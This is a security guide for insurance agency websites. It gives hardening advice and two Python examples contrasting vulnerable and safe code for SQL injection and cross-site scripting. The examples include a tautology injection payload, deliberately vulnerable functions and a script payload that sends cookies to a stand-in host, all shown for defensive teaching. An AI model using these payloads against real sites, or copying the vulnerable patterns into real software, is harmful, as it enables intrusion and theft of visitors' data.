Protecting Your Insurance Agency from Cyber Attacks

Andrew

Cyberattacks are on the rise, so it is no surprise that cyber insurance continues to be one of the fastest-growing lines in the insurance industry. For insurance agencies there are two sides to this: an opportunity for growth in cyber insurance, and the risk of an attack against the agency's own website and the client data behind it. Consider some of these cyber statistics:

  • The average cost of remediating a ransomware attack reached $1.85 million, more than double the $761,106 of the year before. (Sophos, 2021)
  • Data breaches exposed 36 billion records in the first half of 2020.
  • 45% of breaches featured hacking, 17% were malware related and 22% involved phishing.
  • 88% of organizations worldwide experienced phishing attempts (2019).
  • Between 2005 and 2020, there have been over 11,000 recorded breaches.
  • The top malicious email attachment types are .doc and .dot (37%), the next is .exe (19.5%).

How can you make your insurance agency website more secure and limit your exposure to a cyberattack or breach?

The Basics

  • Serve the site over HTTPS. Install a TLS certificate (still commonly called an "SSL certificate"), redirect all HTTP traffic to HTTPS, and enable HSTS so browsers never fall back to plain HTTP. This is mandatory for every website, not only pages with forms.
  • Update your software promptly. This includes the operating system and web server, your custom code, the theme and every plugin. Remove plugins and themes you no longer use; unused code still gets exploited.
  • Use strong, unique passwords. Every account with access to the site (CMS users, hosting control panel, FTP/SFTP, database) should have a long, randomly generated password stored in a password manager, and no password should be reused across services. The computer-generated passwords your system offers are usually the right choice.
  • Educate your users. Make sure every employee and contractor can recognize phishing and other malicious email, and knows where to report a suspicious message.
  • Use anti-malware tooling. Run scheduled malware scans on the web server and on staff workstations, and act on the alerts rather than letting them pile up.


  • Harden your server. Server hardening is the set of measures that reduce your server's attack surface: control who can log in and how (SSH keys rather than passwords, no direct root login), minimize the external footprint by disabling unused services and keeping configuration and backup files out of the web root, patch promptly, restrict administrative access, and give each account and service only the permissions it needs.
  • Use parameterized queries (prepared statements) for every database call that includes user input. Building SQL by concatenating strings is what makes SQL injection possible; binding the values as parameters removes the attacker's ability to change the query.
  • Require multifactor authentication (MFA) for every login, especially administrator accounts. Authenticator apps such as LastPass Authenticator, Microsoft Authenticator and Google Authenticator generate a time-based 6-digit one-time code on your smartphone that is entered alongside the password. Where your platform supports them, hardware security keys or passkeys are stronger still, because a one-time code can be phished in real time while a security key cannot be.
  • Add a web application firewall. Most hosting providers offer one; GoDaddy, for example, sells the Sucuri website firewall, which filters requests before they reach your site. These are inexpensive and should be standard. Because the firewall works as a reverse proxy, you will need to point your DNS A record at it, and you should then configure the origin server to accept web traffic only from the firewall's addresses; otherwise an attacker who learns the origin IP can simply bypass the firewall.
  • Protect against XSS attacks. Cross-site scripting (XSS) lets an attacker inject JavaScript into your agency's pages, where it runs in your visitors' browsers and can alter page content or steal session cookies and form data. Two defenses work together: encode every piece of user-supplied text for the context it is placed in (HTML body, attribute, URL) before rendering it, and send a Content-Security-Policy header that allows only scripts you host and blocks inline JavaScript, so an injected script tag is refused even if one slips through.
  • Manually approve comments. Do not let comments publish automatically; moderating them cuts down on spam and on attempts to post scripts and malicious links.
  • Use CAPTCHAs. Every form should have one. If a third-party CAPTCHA service conflicts with your cookie-consent requirements, add a mandatory challenge field that requires a human decision instead, for example "5 + 4 = ___".
  • Encrypt data. If you capture client information of any kind, encrypt it at rest, keep the encryption keys separate from the data and its backups, and collect only the fields you actually need; data you never stored cannot be breached.
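The difference between concatenated SQL and a parameterized query, as an added example that is not part of the original article. It uses Python's built-in sqlite3 module against a constructed two-row users table; the table, its column names and the sample payload are assumptions made here for illustration, not anything taken from an actual agency site.

```python
import sqlite3

# Constructed sample data: a tiny agent-login table for an imaginary agency site.
SAMPLE_USERS = [
    ("alice", "hash-of-alice-password"),
    ("bob", "hash-of-bob-password"),
]

# Classic tautology payload: closes the quoted string, then ORs in "always true".
PAYLOAD = "' OR '1'='1"


def make_db():
    """Create an in-memory SQLite database holding the constructed sample users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, pw_hash TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def find_user_vulnerable(conn, username):
    """VULNERABLE: the username is pasted straight into the SQL text, so
    whatever the visitor types becomes part of the query itself."""
    sql = "SELECT username FROM users WHERE username = '" + username + "'"
    return [row[0] for row in conn.execute(sql)]


def find_user_parameterized(conn, username):
    """SAFE: the ? placeholder is bound by the driver. The input is only ever
    compared as a string value and cannot change the structure of the query."""
    sql = "SELECT username FROM users WHERE username = ?"
    return [row[0] for row in conn.execute(sql, (username,))]


if __name__ == "__main__":
    conn = make_db()
    # The concatenated query becomes
    #   SELECT username FROM users WHERE username = '' OR '1'='1'
    # and returns every row; the bound query looks for a user literally
    # named "' OR '1'='1" and returns nothing.
    print("vulnerable:    ", find_user_vulnerable(conn, PAYLOAD))
    print("parameterized: ", find_user_parameterized(conn, PAYLOAD))
```

The same principle applies to any database driver: in PHP use PDO prepared statements or, in WordPress, `$wpdb->prepare()`; the important point is that the value travels separately from the SQL text rather than inside it.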
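Output encoding and a Content-Security-Policy header side by side, as an added example that is not part of the original article. It is plain Python with no web framework; the comment text is constructed to look like an XSS attempt, and the page layout, the `/static/app.js` path and the exact header value are assumptions made here.

```python
import html
import secrets

# Constructed: what a visitor typed into the "Comments" box on a quote page.
MALICIOUS_COMMENT = '<script>fetch("https://evil.example/?c=" + document.cookie)</script>'


def render_comment_vulnerable(comment: str) -> str:
    """VULNERABLE: untrusted text is concatenated into HTML unchanged, so a
    <script> tag in the comment executes in every other visitor's browser."""
    return "<div class='comment'>" + comment + "</div>"


def render_comment_escaped(comment: str) -> str:
    """SAFE for an HTML body context: html.escape turns <, >, &, " and ' into
    entities, so the browser displays the text instead of executing it."""
    return "<div class='comment'>" + html.escape(comment, quote=True) + "</div>"


def csp_header(nonce: str) -> str:
    """Content-Security-Policy allowing only same-origin scripts plus <script>
    tags that carry this response's nonce. Injected inline script never has
    the nonce, so the browser refuses to run it even if encoding was missed."""
    return (
        "default-src 'self'; "
        f"script-src 'self' 'nonce-{nonce}'; "
        "object-src 'none'; "
        "base-uri 'self'"
    )


def build_page(comment: str):
    """Return (response headers, HTML body) for a page that shows one comment.
    A fresh nonce is generated per response; reusing one defeats the purpose."""
    nonce = secrets.token_urlsafe(16)
    headers = {"Content-Security-Policy": csp_header(nonce)}
    body = (
        "<html><body>"
        + render_comment_escaped(comment)
        + f'<script nonce="{nonce}" src="/static/app.js"></script>'
        + "</body></html>"
    )
    return headers, body


if __name__ == "__main__":
    print("vulnerable:", render_comment_vulnerable(MALICIOUS_COMMENT))
    headers, body = build_page(MALICIOUS_COMMENT)
    print(headers["Content-Security-Policy"])
    print(body)
```

`html.escape` is correct only for text placed in an HTML body or a quoted attribute; text placed inside a URL, a JavaScript block or a CSS rule needs the encoder for that context, which is why templating engines (Jinja2 autoescaping, WordPress's `esc_html`/`esc_attr`/`esc_url`) expose several. The CSP is the backstop for the case where one of those encodings is forgotten.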